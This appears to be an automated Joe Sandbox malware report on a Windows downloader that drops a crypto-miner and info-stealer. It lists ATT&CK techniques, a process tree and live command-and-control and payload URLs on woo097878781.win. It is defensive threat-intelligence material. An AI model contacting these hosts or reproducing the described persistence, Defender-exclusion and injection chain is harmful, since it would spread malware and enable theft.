                    Source: Yara match | File source: 0000000C.00000002.1939596081.0000029E75DED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7644, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: downloaded_file.exe PID: 7724, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: explorer.exe PID: 7784, type: MEMORYSTR
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, type: DROPPED
                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | 11 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 11 Scripting | 1 Exploitation for Privilege Escalation | 11 Disable or Modify Tools | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | 23 Native API | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 11 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | 1 Windows Service | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 2 Credentials In Files | 3 File and Directory Discovery | SMB/Windows Admin Shares | 21 Input Capture | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | 12 Command and Scripting Interpreter | 2 Registry Run Keys / Startup Folder | 1 Windows Service | 2 Obfuscated Files or Information | NTDS | 126 System Information Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | 2 PowerShell | Network Logon Script | 612 Process Injection | 1 Software Packing | LSA Secrets | 451 Security Software Discovery | SSH | Keylogging | 113 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 2 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | Cached Domain Credentials | 131 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | 13 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Modify Registry | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                    Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 131 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                    IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 612 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                    Numbers before a technique name are the badges rendered beside it in the matrix; techniques without a number carry no badge.
                    Behavior Graph ID: 1571252 | Sample: file.exe | Startdate: 09/12/2024 | Architecture: WINDOWS | Score: 100
                    Top-level network: woo097878781.win; pool.hashvault.pro
                    Top-level signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Found malware configuration; 16 other signatures
                    Process tree (from the behavior graph; dropped files, network destinations and signatures are listed under the process they are attached to):
                    file.exe
                      dropped: C:\Users\user\AppData\Local\Temp\...\295D.bat (ASCII)
                      cmd.exe
                        dropped: C:\Users\user\...\AutoRun_WindosCPUsystem.bat (DOS)
                        signatures: Suspicious powershell command line found; Drops script or batch files to the startup folder; Adds a directory exclusion to Windows Defender
                        downloaded_file.exe
                          signatures: Multi AV Scanner detection for dropped file; Found evasive API chain (may stop execution after checking mutex); Machine Learning detection for dropped file; 6 other signatures
                          explorer.exe
                            network: 185.157.162.216 (ports 49739, 49741, 49744; OBE-EUROPEObenetworkEuropeSE, Sweden)
                            dropped: C:\ProgramData\...\WindosCPUsystem.exe (PE32+)
                            signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Found evasive API chain (may stop execution after checking mutex); 4 other signatures
                            WindosCPUsystem.exe
                              dropped: C:\Users\user\AppData\...\asrjskwdsdoc.sys (PE32+)
                              signatures: Machine Learning detection for dropped file; Injects code into the Windows Explorer (explorer.exe); Uses powercfg.exe to modify the power settings; 4 other signatures
                              explorer.exe
                                network: 5.188.137.200 (ports 3333, 49816; SELECTEL-MSKRU, Russian Federation); pool.hashvault.pro 37.203.243.102 (ports 3333, 49742; DAPLDATAPLANETLtdRU, Russian Federation)
                                signatures: System process connects to network (likely due to code injection or exploit); Query firmware table information (likely to detect VMs); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                              powercfg.exe
                                conhost.exe
                              powercfg.exe
                                conhost.exe
                              2 other processes
                                conhost.exe
                                conhost.exe
                            explorer.exe
                              signatures: Tries to harvest and steal browser information (history, passwords, etc)
                          cmd.exe
                            signatures: Adds a directory exclusion to Windows Defender
                            powershell.exe
                              signatures: Loading BitLocker PowerShell Module
                            conhost.exe
                        powershell.exe
                          signatures: Found suspicious powershell code related to unpacking or dynamic code loading; Loading BitLocker PowerShell Module; Powershell drops PE file
                        powershell.exe
                          network: woo097878781.win 154.216.20.243 (ports 443, 49730, 49737; SKHT-ASShenzhenKatherineHengTechnologyInformationCo, Seychelles)
                          dropped: C:\Users\user\AppData\...\downloaded_file.bin (data)
                        4 other processes
                          dropped: C:\Users\user\AppData\...\downloaded_file.exe (PE32)
                          net1.exe
                    cmd.exe
                      WindosCPUsystem.exe
                        signatures: Found direct / indirect Syscall (likely to bypass EDR); Modifies power options to not sleep / hibernate
                        powercfg.exe
                          conhost.exe
                        powercfg.exe
                          conhost.exe
                        powercfg.exe
                          conhost.exe
                        powercfg.exe
                          conhost.exe
                      conhost.exe

                    Source | Detection | Scanner | Label
                    file.exe | 34% | ReversingLabs | Win64.Downloader.Generic
                    file.exe | 45% | Virustotal |
                    file.exe | 100% | Joe Sandbox ML |
                    Source | Detection | Scanner | Label
                    C:\Users\user\AppData\Local\Temp\downloaded_file.exe | 100% | Joe Sandbox ML |
                    C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | 100% | Joe Sandbox ML |
                    C:\Users\user\AppData\Local\Temp\asrjskwdsdoc.sys | 5% | ReversingLabs |
                    C:\Users\user\AppData\Local\Temp\downloaded_file.exe | 83% | ReversingLabs | Win32.Trojan.Doina
                    No Antivirus matches
                    Source | Detection | Scanner | Label
                    woo097878781.win | 11% | Virustotal |
                    Source | Detection | Scanner | Label
                    https://woo097878781.win/32.EXEhttps://woo097878781.win/64.EXEhttps://woo097878781.win/upload.php66M | 0% | Avira URL Cloud | safe
                    https://woo097878781.win/downloaded_file.bin | 0% | Avira URL Cloud | safe
                    https://woo097878781.win/rdpi2 | 0% | Avira URL Cloud | safe
                    https://woo097878781.win/64.EXEhttps://woo097878781.win/upload.php66Mozilla/5.0 | 0% | Avira URL Cloud | safe
                    https://woo097878781.win/WindosCPUsystem.exeWindowsSystem1 | 0% | Avira URL Cloud | safe
                    https://woo097878781.win/8p | 0% | Avira URL Cloud | safe
                    https://woo097878781.win/66/api/endpoint.phpJWO | 0% | Avira URL Cloud | safe
                    https://woo097878781.win/WindosCPUsystem.exe | 100% | Avira URL Cloud | malware
                    https://woo097878781.win/66/api/endpoint.php | 0% | Avira URL Cloud | safe
                    https://woo097878781.win | 0% | Avira URL Cloud | safe
                    https://woo097878781.win/WindosCPUsystem.exeWindowsSystem1WindosCPUsystem.exe | 0% | Avira URL Cloud | safe
                    https://woo097878781.win/66/api/endpoint.php--cinit-version=3.4.1--nicehash--tls--cinit-idle-wait=5- | 0% | Avira URL Cloud | safe
                    https://woo097878781.win/ | 0% | Avira URL Cloud | safe
                    https://woo097878781.win/upload.php | 100% | Avira URL Cloud | malware
                    https://woo097878781.win/32.EXE | 0% | Avira URL Cloud | safe
                    https://woo097878781.win/66/api/endpoint.php6 | 0% | Avira URL Cloud | safe
                    https://woo097878781.win:443/upload.phpZ | 0% | Avira URL Cloud | safe
                    https://woo097878781.win/r | 0% | Avira URL Cloud | safe
                    https://woo097878781.win:443/upload.php | 100% | Avira URL Cloud | malware
                    http://woo097878781.win | 0% | Avira URL Cloud | safe
                    https://woo097878781.win/66/api/endpoint.phpProvider | 0% | Avira URL Cloud | safe
                    https://woo097878781.win/downloaded_file.bin | 6% | Virustotal |
                    https://woo097878781.win/66/api/endpoint.phpyeerysyjbfoqmofc | 0% | Avira URL Cloud | safe
                    https://woo097878781.win/C | 0% | Avira URL Cloud | safe
                    https://woo097878781.win/64.EXE | 0% | Avira URL Cloud | safe
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    pool.hashvault.pro | 37.203.243.102 | true | false | | high
                    woo097878781.win | 154.216.20.243 | true | true | | unknown
                    Name | Malicious | Antivirus Detection | Reputation
                    https://woo097878781.win/downloaded_file.bin | true | 6%, Virustotal; Avira URL Cloud: safe | unknown
                    https://woo097878781.win/WindosCPUsystem.exe | true | Avira URL Cloud: malware | unknown
                    https://woo097878781.win/64.EXE | true | Avira URL Cloud: safe | unknown
                    Name | Source | Malicious | Antivirus Detection | Reputation
                    http://nuget.org/NuGet.exe | powershell.exe, 00000007.00000002.1823090000.0000023864C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1823090000.0000023864DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1807712895.0000023856574000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000007.00000002.1807712895.0000023856378000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://woo097878781.win/rdpi2 | explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
                    http://pesterbdd.com/images/Pester.png | powershell.exe, 00000007.00000002.1807712895.00000238564EE000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://r11.o.lencr.org0# | explorer.exe, 00000012.00000003.2618390437.0000000002841000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618077052.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2643180030.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618256867.0000000002840000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    https://woo097878781.win/64.EXEhttps://woo097878781.win/upload.php66Mozilla/5.0 | downloaded_file.exe, 0000000D.00000003.1947121395.0000000001063000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
                    http://crl.microsoft | powershell.exe, 00000007.00000002.1807555858.00000238530B4000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000007.00000002.1807712895.00000238564EE000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://go.micro | powershell.exe, 00000007.00000002.1807712895.0000023855822000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://woo097878781.win/WindosCPUsystem.exeWindowsSystem1 | explorer.exe, 00000010.00000002.2934582465.00000000030A0000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
                    https://woo097878781.win/32.EXEhttps://woo097878781.win/64.EXEhttps://woo097878781.win/upload.php66M | powershell.exe, 0000000C.00000002.1939596081.0000029E75EE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1939596081.0000029E75F5E000.00000004.00000800.00020000.00000000.sdmp, downloaded_file.exe, 0000000D.00000000.1946157857.0000000000376000.00000008.00000001.01000000.00000007.sdmp, downloaded_file.exe, 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp, explorer.exe, 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
                    https://contoso.com/License | powershell.exe, 00000007.00000002.1807712895.0000023856574000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://contoso.com/Icon | powershell.exe, 00000007.00000002.1807712895.0000023856574000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://woo097878781.win/8p | explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
                    https://woo097878781.win/66/api/endpoint.phpJWO | explorer.exe, 0000001C.00000003.2059032550.0000000001430000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2061842707.000000000143A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
                    https://aka.ms/pscore6 | powershell.exe, 0000000C.00000002.1932629434.0000029E65DB7000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://woo097878781.win/66/api/endpoint.php | explorer.exe, 0000001C.00000002.2933340637.00000000013C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2504693994.0000000001430000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
                    https://github.com/Pester/Pester | powershell.exe, 00000007.00000002.1807712895.00000238564EE000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://woo097878781.win | explorer.exe, 0000001C.00000003.2059032550.0000000001430000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
                    https://woo097878781.win/WindosCPUsystem.exeWindowsSystem1WindosCPUsystem.exe | powershell.exe, 0000000C.00000002.1939596081.0000029E75EDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1939596081.0000029E75F59000.00000004.00000800.00020000.00000000.sdmp, downloaded_file.exe, 0000000D.00000000.1946157857.0000000000371000.00000008.00000001.01000000.00000007.sdmp, downloaded_file.exe, 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp, explorer.exe, 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2642019432.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934582465.00000000030E3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934582465.00000000030E1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934582465.00000000030DD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934582465.00000000030DA000.00000004.00000020.00020000.00000000.sdmp | true
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://r11.i.lencr.org/0explorer.exe, 00000012.00000003.2618390437.0000000002841000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618077052.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2643180030.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618256867.0000000002840000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://woo097878781.win/66/api/endpoint.php--cinit-version=3.4.1--nicehash--tls--cinit-idle-wait=5-explorer.exe, 0000001C.00000002.2933340637.00000000013C6000.00000004.00000020.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://woo097878781.win/explorer.exe, 00000010.00000003.2038309089.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618077052.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2643180030.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://woo097878781.win/upload.phpexplorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://woo097878781.win/32.EXEdownloaded_file.exetrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://x1.c.lencr.org/0explorer.exe, 00000012.00000003.2618390437.0000000002841000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618077052.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2643180030.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618256867.0000000002840000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://x1.i.lencr.org/0explorer.exe, 00000012.00000003.2618390437.0000000002841000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618077052.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2643180030.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618256867.0000000002840000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://woo097878781.win/66/api/endpoint.php6explorer.exe, 0000001C.00000002.2933340637.0000000001389000.00000004.00000020.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://woo097878781.win:443/upload.phpZexplorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://contoso.com/powershell.exe, 00000007.00000002.1807712895.0000023856574000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.1823090000.0000023864C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1823090000.0000023864DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1807712895.0000023856574000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://woo097878781.win/rexplorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://woo097878781.win:443/upload.phpexplorer.exe, 00000012.00000003.2618390437.00000000028D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2689278327.00000000028D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618618812.00000000028D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://woo097878781.winpowershell.exe, 00000007.00000002.1807712895.0000023856262000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://oneget.orgXpowershell.exe, 00000007.00000002.1807712895.0000023856378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://aka.ms/pscore68powershell.exe, 00000007.00000002.1807712895.0000023854BF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1932629434.0000029E65DDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.1807712895.0000023854BF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1932629434.0000029E65E06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://woo097878781.win/66/api/endpoint.phpProviderexplorer.exe, 0000001C.00000002.2933340637.0000000001389000.00000004.00000020.00020000.00000000.sdmptrue
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://oneget.orgpowershell.exe, 00000007.00000002.1807712895.0000023856378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://woo097878781.win/66/api/endpoint.phpyeerysyjbfoqmofcexplorer.exe, 0000001C.00000003.2046419071.00000000013E1000.00000004.00000020.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://woo097878781.win/Cexplorer.exe, 00000010.00000003.2038309089.0000000000D61000.00000004.00000020.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
37.203.243.102 | pool.hashvault.pro | Russian Federation | 44964 | DAPLDATAPLANETLtd (RU) | false
5.188.137.200 | unknown | Russian Federation | 50340 | SELECTEL-MSK (RU) | true
185.157.162.216 | unknown | Sweden | 197595 | OBE-EUROPEObenetworkEurope (SE) | true
154.216.20.243 | woo097878781.win | Seychelles | 135357 | SKHT-ASShenzhenKatherineHengTechnologyInformationCo | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1571252
Start date and time: 2024-12-09 07:36:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 27s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 41
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.mine.winEXE@59/22@2/4
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 131
• Number of non-executed functions: 247
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7216 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7644 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:36:58 | API Interceptor | 73x Sleep call for process: powershell.exe modified
01:37:34 | API Interceptor | 2x Sleep call for process: WindosCPUsystem.exe modified
01:37:34 | API Interceptor | 95x Sleep call for process: explorer.exe modified
06:37:27 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRun_WindosCPUsystem.bat
06:37:28 | Task Scheduler | Run new task: WindowsSystem path: "C:\ProgramData\WindowsSystem\WindowsSystem.exe" s>{34E50511-FBB8-42F8-98A2-2629192A03A0}
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              37.203.243.102file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                lokigod.exeGet hashmaliciousXmrigBrowse
                                                                  xblkpfZ8Y4.exeGet hashmaliciousXmrigBrowse
                                                                    5.188.137.200file.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                                      nfkciRoR4j.exeGet hashmaliciousXmrigBrowse
                                                                        185.157.162.216file.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                                          file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                            154.216.20.243file.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                                              file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                https://zillow-online.com/realestate/one/drive/docs/Get hashmaliciousHTMLPhisherBrowse
                                                                                  https://zillow-online.com/realestate/one/drive/docs/Get hashmaliciousHTMLPhisherBrowse
                                                                                    https://estacionar-replonline.net/galicia/?fbclid=PAZXh0bgNhZW0BMAABpjGet hashmaliciousUnknownBrowse
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      pool.hashvault.profile.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                                                      • 37.203.243.102
                                                                                      file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                      • 5.188.137.200
                                                                                      lokigod.exeGet hashmaliciousXmrigBrowse
                                                                                      • 37.203.243.102
                                                                                      xblkpfZ8Y4.exeGet hashmaliciousXmrigBrowse
                                                                                      • 5.188.137.200
                                                                                      0kToM9fVGQ.exeGet hashmaliciousXmrigBrowse
                                                                                      • 45.76.89.70
                                                                                      prog.exeGet hashmaliciousXmrigBrowse
                                                                                      • 95.179.241.203
                                                                                      bypass.exeGet hashmaliciousXmrigBrowse
                                                                                      • 95.179.241.203
                                                                                      loader.exeGet hashmaliciousXmrigBrowse
                                                                                      • 142.202.242.43
                                                                                      7K5DrSyL8Y.exeGet hashmaliciousXmrigBrowse
                                                                                      • 45.76.89.70
                                                                                      eshkere.batGet hashmaliciousXmrigBrowse
                                                                                      • 95.179.241.203
                                                                                      woo097878781.winfile.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                                                      • 154.216.20.243
                                                                                      file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                      • 154.216.20.243
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      SELECTEL-MSKRUfile.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                                                      • 5.188.137.200
                                                                                      nfkciRoR4j.exeGet hashmaliciousXmrigBrowse
                                                                                      • 5.188.137.200
                                                                                      442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                                                      • 95.213.205.83
                                                                                      442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                                                      • 95.213.205.83
                                                                                      442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                                                      • 95.213.205.83
                                                                                      442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                                                      • 95.213.205.83
                                                                                      https://telegra.ph/yyrgrfwdfeg-10-25?4077Get hashmaliciousUnknownBrowse
                                                                                      • 5.188.114.126
                                                                                      https://petsworld.nl/trigger.php?r_link=https%3A%2F%2Ftelegra.ph%2Fyyrgrfwdfeg-10-25%3F4077Get hashmaliciousUnknownBrowse
                                                                                      • 5.188.114.126
                                                                                      nabarm5.elfGet hashmaliciousUnknownBrowse
                                                                                      • 82.148.14.47
                                                                                      na.elfGet hashmaliciousUnknownBrowse
                                                                                      • 37.9.7.204
                                                                                      DAPLDATAPLANETLtdRUfile.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                      • 37.203.243.102
                                                                                      lokigod.exeGet hashmaliciousXmrigBrowse
                                                                                      • 37.203.243.102
                                                                                      xblkpfZ8Y4.exeGet hashmaliciousXmrigBrowse
                                                                                      • 37.203.243.102
                                                                                      v859oajfVH.elfGet hashmaliciousUnknownBrowse
                                                                                      • 37.203.242.178
                                                                                      oAUrOBvfbV.elfGet hashmaliciousMiraiBrowse
                                                                                      • 93.188.42.246
